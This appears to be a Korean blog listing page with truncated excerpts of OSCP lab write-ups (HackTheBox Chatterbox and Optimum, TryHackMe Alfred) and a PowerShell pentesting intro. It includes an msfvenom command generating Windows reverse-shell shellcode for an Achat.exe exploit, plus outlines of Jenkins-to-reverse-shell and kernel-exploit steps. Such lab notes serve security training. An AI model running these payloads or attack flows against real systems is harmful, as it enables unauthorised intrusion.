nishang 4

[Windows] Chatterbox

Chatterbox- Exploit POC 스크립트를 수정하는 법을 알아야함- 파워쉘 명령어에 익숙해야함 Achat.exe에 대한 exploit이 존재함=> 페이로드 poc가 cmd 실행으로 되어있어서 리버스 쉘 옵션으로 교체함그 외 배드캐릭터 옵션과 인코딩 등 다른 옵션들은 그대로 사용 msfvenom -a x86 platform windows -p windows/shell_reverse_tcplhost=... lport=... -e x86/unicode_mixed -b "\x00...." BufferRegister=EAX -f python 완성된 쉘코드를 파이썬 스크립트 상에서 교체 후 타겟 IP와 포트 확인 후 변경하여 Exploit +POC 분석에 대하여 1152 - len(Payload)이 코드..

OSCP/HackTheBox 2020.09.24

[Windows] Optimum

커널 익스플로잇 windows exploit suggester 공격 대상 systeminfo 결과 복사 후 로컬에 systeminfo.txt 생성 * hotfix 정보까지 저장해야 missing-patch 취약점도 찾아낼 수 있다. cmd> systeminfo I found some Hotfix's A hotfix or quick-fix engineering update is a single, cumulative package that includes information that is used to address a problem in a software product. DB업데이트 python windows-exploit-suggester.py --update Exploit 검색 python wind..

OSCP/HackTheBox 2020.05.21

파워 쉘 for 침투테스트-1

실행정책 체크 가장 먼저해야 될 일은 파워 쉘 스크립트 파일(.ps1)을 실행 가능한지 체크하는 것이다. cmd> powershell Get-ExecutionPolicy 보안상의 이유로 스크립트 실행에 대한 기본 정책은 Restricted입니다. 다른 스크립트 정책은 다음과 같습니다. Restricted: 파워쉘은 어떤 스크립트든 실행할 수 없다. (파워쉘의 디폴트 실행 정책) Bypass: 어떤 것도 차단되지 않으며 경고나 프롬프트가 없습니다. AllSigned: PowerShell: 디지털 서명으로 서명 된 스크립트 만 실행합니다. 게시자가 서명 한 스크립트를 실행하면 PowerShell은 이전에 보지 못했지만 PowerShell은 스크립트의 게시자를 신뢰할지 묻습니다. RemoteSigned: Po..

OSCP/시험대비 2020.04.16

[Windows] Alfred

Alfred Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens. 잰킨스 Exploit 잰킨스는 project 옵션 -> configure -> build -> windows batch command 를 통해 쉘을 설정하고 build now를 클릭하여 원하는 명령을 실행할 수 있었다. 이를 이용해 잰킨스 관리자 계정을 알고있으면 시스템의 리버스 쉘을 획득할 수있다. 공격 Flow 1. Nishang 파워 쉘 다운 후 바로 nc로 리버스 연결 2. 미터프리터로 쉘 스위치 (권한상승을 더 쉽게 하기 위함) - venom으로 생성 후 다시 잰킨스에서 리버스..

OSCP/TryHackMe 2020.04.16